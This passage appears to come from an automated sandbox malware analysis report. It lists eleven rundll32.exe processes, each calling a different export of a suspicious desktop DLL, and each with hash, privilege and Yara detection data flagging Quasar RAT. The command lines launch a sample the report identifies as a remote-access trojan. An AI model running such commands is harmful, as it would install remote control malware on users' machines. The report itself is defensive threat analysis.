                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:15
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:false

                                  General

                                  Target ID:17
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  Disassembly

                                  No disassembly